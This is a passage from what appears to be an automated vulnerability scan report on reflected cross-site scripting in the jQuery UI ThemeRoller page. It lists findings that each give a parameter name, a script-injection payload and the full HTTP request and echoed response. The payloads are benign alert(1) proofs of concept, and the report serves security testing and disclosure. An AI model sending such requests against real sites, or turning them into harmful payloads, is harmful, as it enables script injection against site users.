tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa65cd7"><script>alert(1)</script>fc8cfd864d1&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

3.41. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f05c"><script>alert(1)</script>260217d18f0 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa5f05c"><script>alert(1)</script>260217d18f0&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa5f05c"><script>alert(1)</script>260217d18f0&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

3.42. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb0dc"><script>alert(1)</script>0438cc2541 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3fb0dc"><script>alert(1)</script>0438cc2541&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3fb0dc"><script>alert(1)</script>0438cc2541&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

3.43. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200d2"><script>alert(1)</script>efe4a57817 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a200d2"><script>alert(1)</script>efe4a57817&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a200d2"><script>alert(1)</script>efe4a57817&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

3.44. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff3a8"><script>alert(1)</script>25cc0117949 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaff3a8"><script>alert(1)</script>25cc0117949&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaff3a8"><script>alert(1)</script>25cc0117949&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

3.45. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7165b"><script>alert(1)</script>3b4b521d593 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa17165b"><script>alert(1)</script>3b4b521d593&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa17165b"><script>alert(1)</script>3b4b521d593&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

3.46. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46bd0"><script>alert(1)</script>574ccf7b54f was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999946bd0"><script>alert(1)</script>574ccf7b54f&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999946bd0"><script>alert(1)</script>574ccf7b54f&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

3.47. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da997"><script>alert(1)</script>393dd978478 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxda997"><script>alert(1)</script>393dd978478&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxda997"><script>alert(1)</script>393dd978478&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.48. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e7ae"><script>alert(1)</script>8978ab3951d was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px3e7ae"><script>alert(1)</script>8978ab3951d HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px3e7ae"><script>alert(1)</script>8978ab3951d" type="text/css" media="all" />
...[SNIP]...

3.49. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4728a"><script>alert(1)</script>e4181889fbb was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=2121214728a"><script>alert(1)</script>e4181889fbb&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=2121214728a"><script>alert(1)</script>e4181889fbb&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

3.50. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69af0"><script>alert(1)</script>18274536c6e was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

